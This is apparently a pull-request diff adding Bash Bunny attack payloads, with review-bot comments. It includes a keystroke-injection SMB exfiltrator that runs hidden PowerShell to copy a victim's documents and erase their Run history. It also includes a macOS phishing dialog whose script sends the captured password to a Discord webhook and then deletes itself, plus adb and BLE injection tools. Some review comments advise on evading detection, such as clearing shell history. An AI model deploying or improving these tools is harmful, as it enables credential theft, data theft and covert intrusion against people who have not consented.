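Review bot: the `<p>` opened on the `Author: 0i41E<br>` line is never closed, so in some renderers the raw-HTML block swallows the markdown that follows; close it after `Version: 1.0<br>` or drop the HTML and use plain lines like the other READMEs in this repository. Wording: `Bunnys switch folder` should be `Bunny's switch folder` and `**Instruction:**` should be `**Instructions:**`. The note about the 40-character serial-number limit and the space-to-underscore rule belongs under Instructions, before the upload step, since it constrains what the user may put in the serial number.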
@ -2,7 +2,7 @@
|
|||
#
|
||||
# Title: WifiSnatch
|
||||
# Description: Extract wifi information, such as passphrases & SSIDs
|
||||
# Author: 0iphor13
|
||||
# Author: 0i41E
|
||||
# Version: 1.1
|
||||
# Category: Exfiltration
|
||||
# Attackmodes: HID, Storage
|
||||
|
|
|
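Review bot: the `# Author:` line changes from `0iphor13` to `0i41E` while `# Version: 1.1` is unchanged; if this is a rename of the same handle, the WifiSnatch README and any other payloads credited to `0iphor13` should be updated in the same change so the credits stay consistent, and a one-line note in the PR description would save reviewers from wondering whether authorship actually changed.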
@ -0,0 +1,50 @@
|
|||
# Faster SMB Exfiltrator V 2.0
|
||||
|
||||
* Author: Hak5Darren
|
||||
* Props: ImNatho, mike111b, madbuda, jblk01
|
||||
* Version: Version 1.6.1
|
||||
* Target: Windows XP SP3+ (Powershell)
|
||||
* Category: Exfiltration
|
||||
* Attackmodes: HID, Ethernet
|
||||
|
||||
## Description
|
||||
|
||||
Exfiltrates select files from users's documents folder via SMB.
|
||||
Liberated documents will reside in Bash Bunny loot directory under loot/smb_exfiltrator/HOSTNAME/DATE_TIME
|
||||
|
||||
## Configuration
|
||||
|
||||
Configured to copy docx, pdf, and xlsx files by default. Change $exfil_ext# in s.ps1 to desired.
|
||||
|
||||
## STATUS
|
||||
|
||||
| LED | Status |
|
||||
| ------------------- | -------------------------------------- |
|
||||
| Red (blinking) | Impacket not found in /pentest |
|
||||
| Yellow Single | Ethernet Stage |
|
||||
| Yellow Double | HID Stage |
|
||||
| Cyan | Receiving files |
|
||||
| White | Moving liberated files to mass storage |
|
||||
| Green | Finished |
|
||||
|
||||
# NOTICE
|
||||
|
||||
As of May 2019, Microsoft has disabled both SMB version 2 along with disallowing anonymous access to an SMB share.
|
||||
To fix this, first follow these instructions, then you may use both the payload.txt and the s.ps1 files.
|
||||
|
||||
# Starting from a fresh Bash Bunny
|
||||
|
||||
1. apt update ; apt install gcc
|
||||
2. pip install impacket
|
||||
3. cd /tools/
|
||||
4. wget https://github.com/SecureAuthCorp/impacket/releases/download/impacket_0_9_19/impacket-0.9.19.tar.gz
|
||||
5. tar -xzvf impacket-0.9.19.tar.gz ; mv -v impacket-0.9.19/ impacket/
|
||||
6. python impacket/examples/smbserver - ## You should see entries for both a '-username' and a '-password'
|
||||
|
||||
Both the username and the password have been set as 'user' and 'Password01' respectively.
|
||||
|
||||
# Changes to the payload.txt include:
|
||||
|
||||
* Support for SMB version 2 enabled.
|
||||
* Username and password set to bypass Microsoft's disallowing of anonymous access.
|
||||
* Authentication to said SMB share with credentials specified in both the payload.txt and s.ps1 files.
|
|
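Review bot: the NOTICE says Microsoft `has disabled both SMB version 2`; that is not accurate. What current Windows disables by default is SMBv1, and separately it blocks guest (anonymous) access to SMB2 shares; SMB2 itself stays enabled, which is exactly why the `-smb2support` flag and the `user`/`Password01` credentials in payload.txt are needed. Reword to something like `disabled SMBv1 and blocked guest access to SMB2 shares`. Also: the title says `V 2.0` while the Version bullet says `Version 1.6.1` (payload.txt has the same pair), `users's` should be `user's`, and step 6, `python impacket/examples/smbserver -`, is cut off mid-command; the script used by payload.txt is `smbserver.py`.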
@ -0,0 +1,85 @@
|
|||
#!/bin/bash
|
||||
#
|
||||
# Title: Faster SMB Exfiltrator version 2.0
|
||||
# Author: Hak5Darren
|
||||
# Props: ImNatho, mike111b, madbuda, jblk01
|
||||
# Version: 1.6.1
|
||||
# Category: Exfiltration
|
||||
# Target: Windows XP SP3+ (Powershell)
|
||||
# Attackmodes: HID, Ethernet
|
||||
#
|
||||
# REQUIREMENTS
|
||||
# ============
|
||||
# SETUP:
|
||||
#
|
||||
# 1. apt update ; apt install gcc
|
||||
# 2. pip install impacket
|
||||
# 3. cd /tools/
|
||||
# 4. wget https://github.com/SecureAuthCorp/impacket/releases/download/impacket_0_9_19/impacket-0.9.19.tar.gz
|
||||
# 5. tar -xzvf impacket-0.9.19.tar.gz ; mv -v impacket-0.9.19/ impacket/
|
||||
#
|
||||
#
|
||||
# LED STATUS
|
||||
# ==========
|
||||
# FAIL........Failed to find dependencies
|
||||
# STAGE1......Ethernet Stage
|
||||
# STAGE2......HID Stage
|
||||
# SPECIAL.....Receiving Files
|
||||
# CLEANUP.....Moving Liberated Files
|
||||
# FINISH......Finished
|
||||
#
|
||||
# OPTIONS
|
||||
# =======
|
||||
# Exfiltration options configured from included s.ps1 script
|
||||
|
||||
|
||||
######## INITIALIZATION ########
|
||||
REQUIRETOOL impacket
|
||||
GET SWITCH_POSITION
|
||||
# Make temporary loot directory
|
||||
mkdir -p /loot/smb/
|
||||
# Delete any old exfiltration data
|
||||
rm -rf /loot/smb/*
|
||||
# Copy new powershell payload to smb share
|
||||
cp /root/udisk/payloads/$SWITCH_POSITION/s.ps1 /loot/smb/
|
||||
# Make loot directory on USB Disk
|
||||
mkdir -p /root/udisk/loot/smb_exfiltrator
|
||||
|
||||
|
||||
######## ETHERNET STAGE ########
|
||||
LED STAGE1
|
||||
ATTACKMODE RNDIS_ETHERNET
|
||||
# Start the SMB Server
|
||||
python /tools/impacket/examples/smbserver.py -username user -password Password01 -smb2support -comment '1337' s /loot/smb >> /loot/smbserver.log &
|
||||
|
||||
|
||||
######## HID STAGE ########
|
||||
# Runs hidden powershell which executes \\172.16.64.1\s\s.ps1
|
||||
GET HOST_IP
|
||||
LED STAGE2
|
||||
ATTACKMODE HID RNDIS_ETHERNET
|
||||
RUN WIN powershell
|
||||
Q DELAY 1000
|
||||
Q STRING powershell -windowstyle hidden -exec bypass "net use \\\\$HOST_IP\\s /u:user Password01; powershell -windowstyle hidden -exec bypass \\\\$HOST_IP\\s\\s.ps1; exit"
|
||||
Q DELAY 500
|
||||
Q ENTER
|
||||
LED SPECIAL
|
||||
# Wait until files are done copying
|
||||
while ! [ -f /loot/smb/EXFILTRATION_COMPLETE ]; do sleep 1; done
|
||||
|
||||
|
||||
######## CLEANUP ########
|
||||
LED CLEANUP
|
||||
# Delete EXFILTRATION_COMPLETE file
|
||||
rm -rf /loot/smb/EXFILTRATION_COMPLETE
|
||||
# Move files to udisk loot directory
|
||||
mv /loot/smb/e/* /root/udisk/loot/smb_exfiltrator
|
||||
# Clean up temporary loot directory
|
||||
rm -rf /loot/smb/e/*
|
||||
# Sync file system
|
||||
sync
|
||||
|
||||
|
||||
######## FINISH ########
|
||||
# Trap is clean
|
||||
LED FINISH
|
|
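Review bot: the comment `# Runs hidden powershell which executes \\172.16.64.1\s\s.ps1` hardcodes the Bunny's address while the `Q STRING` beneath it uses `$HOST_IP`; make the comment match, and note that `s.ps1` hardcodes `172.16.64.1` too, so the two files only agree when `GET HOST_IP` returns that address. The background `smbserver.py` is never stopped before `LED FINISH`, and `/loot/smbserver.log` is appended with `>>` and never rotated, so it grows on every run. `rm -rf /loot/smb/e/*` right after `mv /loot/smb/e/* /root/udisk/loot/smb_exfiltrator` is a no-op unless the move failed; if it is meant as a safety net, say so in the comment, otherwise drop it.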
@ -0,0 +1,9 @@
|
|||
$exfil_dir="$Env:UserProfile\Documents"
|
||||
$exfil_ext="*.docx"
|
||||
$exfil_ext1="*.pdf"
|
||||
$exfil_ext2="*.xlsx"
|
||||
$loot_dir="\\172.16.64.1\s\e\$Env:ComputerName\$((Get-Date).ToString('yyyy-MM-dd_hhmmtt'))"
|
||||
mkdir $loot_dir
|
||||
robocopy $exfil_dir $loot_dir $exfil_ext $exfil_ext1 $exfil_ext2 /S /MT /Z
|
||||
New-Item -Path \\172.16.64.1\s -Name "EXFILTRATION_COMPLETE" -Value "EXFILTRATION_COMPLETE"
|
||||
Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue
|
|
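Review bot: `$loot_dir` and the `New-Item -Path \\172.16.64.1\s` line hardcode the Bunny's IP while `payload.txt` computes `$HOST_IP`; the README's Configuration section only mentions `$exfil_ext#` and should say that this address has to match the Bunny's. The final `Remove-ItemProperty ... RunMRU` line clears the user's Run-dialog history on the target; that is an undocumented side effect and should be listed in the README. `robocopy ... /MT` without a count runs with the default of 8 threads; either give the number explicitly or drop the switch so the behaviour is stated rather than implied.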
@ -0,0 +1,46 @@
|
|||
# Title: adb shell dumpsys
|
||||
# Author: D14b0l1c
|
||||
#
|
||||
# Description:
|
||||
# Set the Bash Bunny to ECM Ethernet attack mode
|
||||
# Extract the IP address of the connected device from DHCP leases
|
||||
# Connect to the device using ADB over TCP/IP and save the output to a log file
|
||||
# Dump system information from the device and save it to a file
|
||||
# Indicate that the payload has finished executing
|
||||
#
|
||||
# LED States:
|
||||
# - Purple: Running HID emulation, connecting to the Android device
|
||||
# - Blue Blinking: Running the 'adb shell dumpsys' command
|
||||
# - Red Blinking: Failed to connect to the Android device
|
||||
# - Green: Finished
|
||||
|
||||
# Set the Bash Bunny to ECM Ethernet attack mode
|
||||
ATTACKMODE ECM_ETHERNET
|
||||
|
||||
# Wait for 5 seconds to ensure the network interface is ready
|
||||
sleep 5
|
||||
|
||||
# Extract the IP address of the connected device from DHCP leases
|
||||
TARGET_IP=$(cat /var/lib/dhcp/dhcpd.leases | grep ^lease | awk '{ print $2 }' | sort | uniq)
|
||||
|
||||
# Save the obtained IP address to a log file
|
||||
cat /var/lib/dhcp/dhcpd.leases | grep ^lease | awk '{ print $2 }' | sort | uniq > /root/logs.txt
|
||||
|
||||
# Connect to the device using ADB over TCP/IP and save the output to a log file
|
||||
adb connect ${TARGET_IP}
|
||||
adb connect ${TARGET_IP} > /root/logs.txt
|
||||
|
||||
# Wait for 20 seconds (optional)
|
||||
sleep 20
|
||||
|
||||
# Dump system information from the device and save it to a file
|
||||
adb shell dumpsys > /root/dumpsys.txt
|
||||
|
||||
# Wait for 10 seconds (optional)
|
||||
sleep 10
|
||||
|
||||
# Set the Bash Bunny back to ECM Ethernet attack mode
|
||||
ATTACKMODE ECM_ETHERNET
|
||||
|
||||
# Indicate that the payload has finished executing
|
||||
LED FINISH
|
|
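Review bot: the `# LED States:` header lists Purple, Blue Blinking and Red Blinking, but the body only ever issues `LED FINISH`: there is no HID stage, no `LED` call around `adb shell dumpsys`, and no check of the `adb connect` result that could produce a failure state; either add those calls or trim the header to what the payload does. `adb connect ${TARGET_IP} > /root/logs.txt` overwrites the lease list the previous command just wrote to the same file; use a second filename or `>>`. `TARGET_IP` is built from every `lease` line in `dhcpd.leases` through `sort | uniq`, so with more than one lease it holds several newline-separated addresses, which a single `adb connect` will not accept; the comment should state the single-lease assumption. The second `ATTACKMODE ECM_ETHERNET` re-applies the mode already set at the top and can go, `cat file | grep` can be `grep ^lease file`, and the header lacks the `# Version:` / `# Category:` / `# Attackmodes:` lines every other payload carries.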
@ -0,0 +1,35 @@
|
|||
## Requirements
|
||||
|
||||
Before using this Bash Bunny payload, please ensure you meet the following requirements:
|
||||
|
||||
- **Bash Bunny device**: This payload is designed to run on the Bash Bunny hardware platform. Make sure you have a Bash Bunny device available.
|
||||
- **Installation of essential `adb` packages**: In order to enable `adb` functionality on the Bash Bunny, you need to install the following packages:
|
||||
- `android-liblog`
|
||||
- `android-libbase`
|
||||
- `android-libcutils`
|
||||
- `android-libadb`
|
||||
- `adb`
|
||||
|
||||
### Installing Essential `adb` Packages
|
||||
|
||||
To install the required `adb` packages on your Bash Bunny, follow these steps:
|
||||
|
||||
1. Connect your Bash Bunny to a computer.
|
||||
2. Open a terminal window and navigate to the Bash Bunny storage directory.
|
||||
3. Execute the following commands to download and install the essential `adb` packages:
|
||||
|
||||
```bash
|
||||
wget --no-check-certificate https://archive.debian.org/debian/pool/main/a/android-platform-system-core/android-liblog_7.0.0+r33-1_armhf.deb
|
||||
dpkg -i android-liblog_7.0.0+r33-1_armhf.deb
|
||||
|
||||
wget --no-check-certificate https://archive.debian.org/debian/pool/main/a/android-platform-system-core/android-libbase_7.0.0+r33-1_armhf.deb
|
||||
dpkg -i android-libbase_7.0.0+r33-1_armhf.deb
|
||||
|
||||
wget --no-check-certificate https://archive.debian.org/debian/pool/main/a/android-platform-system-core/android-libcutils_7.0.0+r33-1_armhf.deb
|
||||
dpkg -i android-libcutils_7.0.0+r33-1_armhf.deb
|
||||
|
||||
wget --no-check-certificate https://archive.debian.org/debian/pool/main/a/android-platform-system-core/android-libadb_7.0.0+r33-1_armhf.deb
|
||||
dpkg -i android-libadb_7.0.0+r33-1_armhf.deb
|
||||
|
||||
wget --no-check-certificate https://archive.debian.org/debian/pool/main/a/android-platform-system-core/adb_7.0.0+r33-1_armhf.deb
|
||||
dpkg -i adb_7.0.0+r33-1_armhf.deb
|
|
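Review bot: the `bash` code fence opened before the first `wget` line is never closed in this file (the hunk adds 35 lines and ends at `dpkg -i adb_7.0.0+r33-1_armhf.deb`), so anything that follows on the rendered page is swallowed into the code block; add the closing fence. Every `wget` passes `--no-check-certificate`, which disables TLS certificate validation for packages that are then installed as root with `dpkg -i`; archive.debian.org serves a valid certificate, so the flag is unnecessary, and if an older Bunny image lacks current CA roots the right fix is to update `ca-certificates` or to verify each `.deb` against the checksums published in the Debian archive before installing. Step 2, `navigate to the Bash Bunny storage directory`, is ambiguous given that the `dpkg` commands have to run on the Bunny itself; say that these commands are typed in a shell on the Bunny (serial or SSH) with network access.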
@ -0,0 +1,24 @@
|
|||
# MacAlertPhisher
|
||||
* Author: 90N45
|
||||
* Version: 1.0
|
||||
* Target: Mac
|
||||
* Attackmodes: HID, STORAGE
|
||||
|
||||
### Description
|
||||
Creates a customizable alert that prompts for the victim's credentials and shares them with you via Discord. Even after unplugging the Bash Bunny.
|
||||
|
||||
<img width="532" alt="MAcAlertPhisher_alert_preview" src="https://github.com/90N45-d3v/bashbunny-payloads/assets/79598596/d52f4924-c51a-46fd-b2c3-2a8cce45e2cc">
|
||||
<br>
|
||||
<img width="412" alt="MacAlertPhisher_message_preview" src="https://github.com/90N45-d3v/bashbunny-payloads/assets/79598596/8d4e804c-0630-4853-b4ed-7d0904408a50">
|
||||
|
||||
### Setup
|
||||
Please insert your [Discord’s Webhook](https://support.discord.com/hc/en-us/articles/228383668-Intro-to-Webhooks) link into the `discord` variable in the `script.sh` file. Optional, you can change the other variables at the top of the `script.sh` file to your needs.
|
||||
|
||||
### Status
|
||||
| LED | State |
|
||||
| --- | --- |
|
||||
| Magenta solid (SETUP) | Set ATTACKMODE |
|
||||
| Yellow single blink (ATTACK) | Prepaires and executes phishing-script on the victims machine |
|
||||
| Green 1000ms VERYFAST blink followed by SOLID (FINISH) | Attack finished (Ready to unplug) |
|
||||
|
||||
*Average runtime: 27 seconds*
|
|
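Review bot: the Setup section should warn that the Discord webhook URL placed in `discord` is copied in clear text to `/tmp/script.sh` on the target and stays there, readable by any local user, until the dialog is answered and the script removes itself; anyone who reads that URL can post to the channel. It should also state the precondition the payload relies on, namely that the Bunny's storage mounts at `/Volumes/BashBunny`. Spelling in the status table: "Prepaires" should be "Prepares" and "victims machine" should be "victim's machine".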
@ -0,0 +1,37 @@
|
|||
#!/bin/bash
|
||||
#
|
||||
# Title: MacAlertPhisher
|
||||
# Description: Creates a customizable alert that prompts for the victim's credentials and shares them with you via Discord. Even after unplugging the Bash Bunny.
|
||||
# Author: 90N45
|
||||
# Version: 1.0
|
||||
# Category: Phishing
|
||||
# Attackmodes: HID, STORAGE
|
||||
|
||||
LED SETUP
|
||||
ATTACKMODE HID VID_0X05AC PID_0X021E STORAGE
|
||||
|
||||
LED ATTACK
|
||||
QUACK GUI SPACE
|
||||
QUACK DELAY 1000
|
||||
QUACK STRING terminal
|
||||
QUACK ENTER
|
||||
QUACK DELAY 2500
|
||||
|
||||
QUACK STRING "cp /Volumes/BashBunny/payloads/${SWITCH_POSITION}/script.sh /tmp/script.sh"
|
||||
QUACK ENTER
|
||||
QUACK DELAY 1000
|
||||
|
||||
QUACK STRING "diskutil eject /Volumes/BashBunny/"
|
||||
QUACK ENTER
|
||||
QUACK STRING "chmod +x /tmp/script.sh && nohup bash /tmp/script.sh &> /dev/null &"
|
||||
QUACK ENTER
|
||||
QUACK DELAY 2000
|
||||
QUACK GUI SPACE
|
||||
QUACK DELAY 1000
|
||||
QUACK STRING terminal
|
||||
QUACK ENTER
|
||||
QUACK DELAY 1000
|
||||
QUACK STRING "killall Terminal"
|
||||
QUACK ENTER
|
||||
|
||||
LED FINISH
|
|
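Review bot: every command typed here (the `cp`, `diskutil eject`, the `chmod`/`nohup` line and `killall Terminal`) is entered interactively, so it lands in the victim's shell history (zsh by default on current macOS, so `~/.zsh_history`) and stays there after the script deletes itself; if leaving no trace is the goal, a history cleanup step is needed before `killall Terminal`. `killall Terminal` also closes every Terminal window the user already had open, which is both noticeable and destructive. The second Spotlight round-trip (`GUI SPACE`, `terminal`, ENTER) is redundant because Terminal already has focus after the preceding commands, and `chmod +x` is unnecessary since the script is started through `bash /tmp/script.sh`.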
@ -0,0 +1,76 @@
|
|||
#!/bin/bash
|
||||
|
||||
# Discord Webhook Link (NEEDED)
|
||||
discord=""
|
||||
# The alert's title
|
||||
title="Macintosh Security Assistant"
|
||||
# The alert's text
|
||||
dialog="Your Mac has detected unusual activity. Enter your password to confirm that you are the owner."
|
||||
# The alert's icon (for ex. "stop", "caution", "note")
|
||||
icon="stop"
|
||||
# A custom application, that should open the alert (for ex. "Finder")
|
||||
app=""
|
||||
# Base64 encode the entered string to prevent an injection/error
|
||||
base64=false
|
||||
# Check if an internet connection is available and wait until it is before trying to send the Discord message
|
||||
internet_check=false
|
||||
|
||||
#### The main script
|
||||
|
||||
date=$(date)
|
||||
user=$(whoami)
|
||||
|
||||
if [[ ${app} != "" ]]; then
|
||||
pwd=$(osascript -e 'tell app "'"${app}"'" to display dialog "'"${dialog}"'" default answer "" with icon '"${icon}"' with title "'"${title}"'" buttons {"Continue"} default button "Continue" with hidden answer')
|
||||
elif [[ ${app} == "" ]]; then
|
||||
pwd=$(osascript -e 'display dialog "'"${dialog}"'" default answer "" with icon '"${icon}"' with title "'"${title}"'" buttons {"Continue"} default button "Continue" with hidden answer')
|
||||
fi
|
||||
|
||||
pwd=${pwd#*"button returned:Continue, text returned:"}
|
||||
|
||||
if [[ ${base64} == true ]]; then
|
||||
pwd=$(echo $pwd | base64)
|
||||
enc_txt="(Base64)"
|
||||
else
|
||||
enc_txt=""
|
||||
fi
|
||||
|
||||
# Discord Embed Message
|
||||
embed="{
|
||||
\"embeds\": [
|
||||
{
|
||||
\"color\": 14427938,
|
||||
\"footer\": {
|
||||
\"text\": \"Captured: ${date}\"
|
||||
},
|
||||
\"author\": {
|
||||
\"name\": \"Bash Bunny • MacAlertPhisher\",
|
||||
\"url\": \"https://github.com/hak5/bashbunny-payloads/tree/master/payloads/library/phishing/MacAlertPhisher\",
|
||||
\"icon_url\": \"https://www.gitbook.com/cdn-cgi/image/width=40,dpr=2,height=40,fit=contain,format=auto/https%3A%2F%2F3076592524-files.gitbook.io%2F~%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FnxJgJ9UdPfrcuL1U8DpL%252Ficon%252F1UaEKnAJMPWZDBVtU8Il%252Fbb.png%3Falt%3Dmedia%26token%3D43bf1669-462c-4295-b30b-94c295470371\"
|
||||
},
|
||||
\"fields\": [
|
||||
{
|
||||
\"name\": \"Current User\",
|
||||
\"value\": \"${user}\",
|
||||
\"inline\": true
|
||||
},
|
||||
{
|
||||
\"name\": \"Entered Credentials ${enc_txt}\",
|
||||
\"value\": \"${pwd}\",
|
||||
\"inline\": true
|
||||
}
|
||||
]
|
||||
}
|
||||
]
|
||||
}"
|
||||
|
||||
if [[ ${internet_check} == true ]]; then
|
||||
while [[ $(ping -c1 google.com | grep -c "1 packets received") != "1" ]]; do
|
||||
sleep 5
|
||||
done
|
||||
fi
|
||||
|
||||
curl -i -H "Accept: application/json" -H "Content-Type:application/json" -X POST --data "${embed}" ${discord}
|
||||
|
||||
# Self destruct
|
||||
rm /tmp/script.sh
|
|
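Review bot: `\"value\": \"${pwd}\"` in the embed interpolates the captured text into the JSON body unescaped, so a password containing `"` or `\` produces an invalid document that Discord rejects and the capture is lost; the `base64` switch that works around this defaults to `false`. Either default it to `true` or build the body with a JSON encoder (`jq --arg` or `python3 -c 'import json,sys; ...'`) rather than string interpolation. Related: `pwd=$(echo $pwd | base64)` should be `printf '%s' "$pwd" | base64` (unquoted `$pwd` is word-split and glob-expanded, and `echo` interprets a leading `-n`/`-e`). The same unescaped interpolation applies to `${dialog}`, `${title}` and `${app}` inside the osascript one-liners, so operator-supplied text containing a double quote breaks the dialog. Finally, the webhook URL sits in clear text in the readable `/tmp/script.sh` for as long as the dialog is open, and `${discord}` on the `curl` line should be quoted.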
@ -105,7 +105,7 @@ Arf
|
|||
|
||||
* [Hak5](https://hak5.org/)
|
||||
* [MG](https://github.com/OMG-MG)
|
||||
* [0iphor13](https://github.com/0iphor13)
|
||||
* [0i41E](https://github.com/0i41E)
|
||||
* [PhilSutter](https://github.com/PhilSutter)
|
||||
|
||||
|
||||
|
|
|
@ -93,7 +93,7 @@ I am Jakoby
|
|||
|
||||
* [Hak5](https://hak5.org/)
|
||||
* [MG](https://github.com/OMG-MG)
|
||||
* [0iphor13](https://github.com/0iphor13)
|
||||
* [0i41E](https://github.com/0i41E)
|
||||
* [PhilSutter](https://github.com/PhilSutter)
|
||||
|
||||
|
||||
|
|
|
@ -0,0 +1,17 @@
|
|||
# SleepyMacRick
|
||||
* Author: 90N45
|
||||
* Version: 1.0
|
||||
* Target: Mac
|
||||
* Attackmodes: HID, STORAGE
|
||||
|
||||
### Description
|
||||
Installs a script that will listen for user activity in the background. When the user starts working on his machine, a „Rick Roll“ will be triggered.
|
||||
|
||||
### Status
|
||||
| LED | State |
|
||||
| --- | --- |
|
||||
| Magenta solid (SETUP) | Set ATTACKMODE |
|
||||
| Yellow single blink (ATTACK) | Setup and run script on the Mac |
|
||||
| Green 1000ms VERYFAST blink followed by SOLID (FINISH) | „Rick Roll“ is ready and listening for activity |
|
||||
|
||||
*Average runtime: 23 seconds*
|
|
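Review bot: the Description should state the trigger and lifetime precisely: `rick.sh` fires once, when the frontmost application changes from whatever it was when the script started, then deletes itself; it does not survive a logout or reboot, and it never fires if the user keeps working in the application that was already in front. "his machine" should read "their machine".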
@ -0,0 +1,25 @@
|
|||
#!/bin/bash
|
||||
|
||||
LED SETUP
|
||||
ATTACKMODE HID VID_0X05AC PID_0X021E STORAGE
|
||||
|
||||
LED ATTACK
|
||||
# Open terminal
|
||||
QUACK GUI SPACE
|
||||
QUACK DELAY 1000
|
||||
QUACK STRING terminal
|
||||
QUACK ENTER
|
||||
QUACK DELAY 1500
|
||||
|
||||
QUACK STRING "cp /Volumes/BashBunny/payloads/${SWITCH_POSITION}/rick.sh /tmp/rick.sh"
|
||||
QUACK ENTER
|
||||
QUACK DELAY 1000
|
||||
|
||||
QUACK STRING "diskutil eject /Volumes/BashBunny/"
|
||||
QUACK ENTER
|
||||
QUACK STRING "chmod +x /tmp/rick.sh && nohup bash /tmp/rick.sh &> /dev/null &"
|
||||
QUACK ENTER
|
||||
QUACK STRING "killall Terminal"
|
||||
QUACK ENTER
|
||||
|
||||
LED FINISH
|
|
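Review bot: this payload.txt lacks the header block (`# Title:`, `# Description:`, `# Author:`, `# Version:`, `# Category:`, `# Attackmodes:`) that the other payloads in this change carry; add it so the payload is indexed like the rest. As with MacAlertPhisher, the typed `cp`/`diskutil`/`nohup` commands go into the victim's shell history, and `killall Terminal` closes any Terminal windows the user already had open. `chmod +x` is redundant when the script is started with `bash /tmp/rick.sh`.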
@ -0,0 +1,14 @@
|
|||
#! /bin/bash
|
||||
|
||||
sleep 3
|
||||
inactive=$(osascript -e 'tell application "System Events" to tell (first process whose frontmost is true) to return name')
|
||||
|
||||
while [[ ${inactive} = $(osascript -e 'tell application "System Events" to tell (first process whose frontmost is true) to return name') ]]; do
|
||||
sleep 0.5
|
||||
done
|
||||
|
||||
osascript -e "set volume output volume 100"
|
||||
open -u "https://www.youtube.com/watch?v=xvFZjo5PgG0"
|
||||
|
||||
# Self destruct
|
||||
rm /tmp/rick.sh
|
|
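Review bot: the baseline in `inactive=$(osascript ...)` is taken a fixed 3 seconds after launch, which races with the `killall Terminal` typed by the payload: if Terminal is still the frontmost process at that instant, the loop exits as soon as Terminal disappears and the video plays with nobody at the keyboard. Poll until the frontmost process is no longer `Terminal` before recording the baseline. Also quote the right-hand side of the `[[ ${inactive} = $(...) ]]` comparison: unquoted, bash treats it as a glob pattern, so a process name containing `*`, `?` or `[` compares wrongly. Minor: `#! /bin/bash` works, but the conventional form is `#!/bin/bash`.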
@ -0,0 +1,21 @@
|
|||
# TV-Menu-Trigger
|
||||
* Author: 90N45
|
||||
* Version: 1.0
|
||||
* Target: TV
|
||||
* Attackmodes: HID
|
||||
|
||||
### Description
|
||||
This payload opens the main menu of a TV repeatedly at a random interval (1-10 minutes) to confuse and annoy the user.
|
||||
|
||||
### Explanation
|
||||
Almost every TV has the function of being used by a connected USB keyboard. Therefore, we can use the Bash Bunny to emulate a keyboard and inject keystrokes into the TV. In this case, we inject the keycode for the `GUI` key to open the TV's menu (equivalent to the MENU button on your traditional remote control). Of course, the key required to open the menu could change, because of different vendors, but the keycode of the `GUI` key seems to work for most TVs.
|
||||
|
||||
### Tip
|
||||
Plug your Bash Bunny into a USB port of the TV before it is switched on by your target. This makes it easier to overlook the possible message of a connected keyboard (especially with webOS/LG TVs, as the message is very small on these models and is displayed for a short time).
|
||||
|
||||
### Status
|
||||
| LED | State |
|
||||
| --- | --- |
|
||||
| Magenta solid (SETUP) | Set ATTACKMODE and configure CPU performance |
|
||||
| Green 1000ms VERYFAST blink followed by SOLID (FINISH) | Attacking the TV (Currently waiting for the random interval to complete) |
|
||||
| Red 1000ms | Opening the TV’s menu |
|
|
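Review bot: the Status table lists the FINISH state, but the payload issues `LED FINISHED`; the two should agree, and FINISH is the state name the other payloads in this change use. The Explanation's claim that the `GUI` keycode opens the menu on "most TVs" would be more useful with the models actually tested listed, since the text itself says the required key varies by vendor.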
@ -0,0 +1,35 @@
|
|||
#!/bin/bash
|
||||
#
|
||||
# Title: TV-Menu-Trigger
|
||||
# Description: This payload opens the main menu of a TV repeatedly at a random interval (1-10 minutes) to confuse and annoy the user.
|
||||
# Author: 90N45
|
||||
# Version: 1.0
|
||||
# Category: Prank
|
||||
# Attackmodes: HID
|
||||
|
||||
LED SETUP
|
||||
|
||||
ATTACKMODE HID
|
||||
|
||||
# Tune the Bash Bunny's CPU to low power/performance for long term deployments
|
||||
CUCUMBER ENABLE
|
||||
|
||||
LED FINISHED
|
||||
|
||||
while [[ true ]]; do
|
||||
LED G
|
||||
# Generate interval time
|
||||
rand=$((6 + $RANDOM % 60))
|
||||
interval="$rand"0000
|
||||
|
||||
# Wait given interval time
|
||||
Q DELAY ${interval}
|
||||
|
||||
# LED feedback on HID injection
|
||||
LED R
|
||||
|
||||
# Open menu
|
||||
Q GUI
|
||||
|
||||
Q DELAY 1000
|
||||
done
|
|
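Review bot: `rand=$((6 + $RANDOM % 60))` yields 6..65, and appending `0000` turns that into 60000..650000 ms, so the interval is 1 to about 10.8 minutes rather than the 1-10 minutes stated in the header; `rand=$((6 + RANDOM % 55))` gives 6..60. `LED FINISHED` should be `LED FINISH` to match the README and the other payloads here, and `while [[ true ]]` only loops because the string is non-empty; `while true; do` says what is meant.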
@ -0,0 +1,46 @@
|
|||
import pygatt
|
||||
import base64
|
||||
|
||||
adapter = pygatt.GATTToolBackend()
|
||||
char_uuid = '0000fff2-0000-1000-8000-00805f9b34fb'
|
||||
|
||||
def init():
|
||||
adapter.start()
|
||||
return True
|
||||
|
||||
def connect():
|
||||
device_name = 'BlueBunny'
|
||||
|
||||
devices = adapter.scan(run_as_root=True)
|
||||
device = next((d for d in devices if d['name'] == device_name), None)
|
||||
|
||||
if device:
|
||||
device_address = device['address']
|
||||
bunny = adapter.connect(device_address)
|
||||
|
||||
return bunny
|
||||
else:
|
||||
return False
|
||||
|
||||
def send(bunny, data: str, d_type: str):
|
||||
if d_type == "cmd":
|
||||
flag = "<CMD>"
|
||||
else:
|
||||
flag = "<PAYLOAD>"
|
||||
data = flag + data + flag
|
||||
data = base64.b64encode(data.encode("utf-8")).decode("utf-8")
|
||||
|
||||
if not len(data) <= 15:
|
||||
data_pieces = []
|
||||
|
||||
for i in range(0, len(data), 15):
|
||||
data_pieces.append(data[i:i + 15])
|
||||
|
||||
for i, piece in enumerate(data_pieces):
|
||||
if i == (len(data_pieces) - 1):
|
||||
bunny.char_write(char_uuid, (piece + "\n").encode("utf-8"))
|
||||
else:
|
||||
bunny.char_write(char_uuid, piece.encode("utf-8"))
|
||||
|
||||
else:
|
||||
bunny.char_write(char_uuid, (data + "\n").encode("utf-8"))
|
|
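Review bot: the command channel carries no authentication: `send` writes base64 text wrapped in `<CMD>`/`<PAYLOAD>` markers to characteristic `0000fff2-...` on whichever advertiser calls itself `BlueBunny`, so any BLE peer in range that reproduces the framing can inject DuckyScript, and any impostor advertising that name receives the operator's payloads. At minimum, connect to a known device address rather than the advertised name, and carry a shared secret (for example an HMAC over the framed data) that the listener on the Bunny verifies before executing anything. Two logic points: `connect` returns either a device object or `False`, and callers pass that value to `send` unchecked, so a failed connection raises inside `char_write`; and the framing is ambiguous, since a payload that itself contains `<CMD>` or `<PAYLOAD>` cannot be told apart from the markers.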
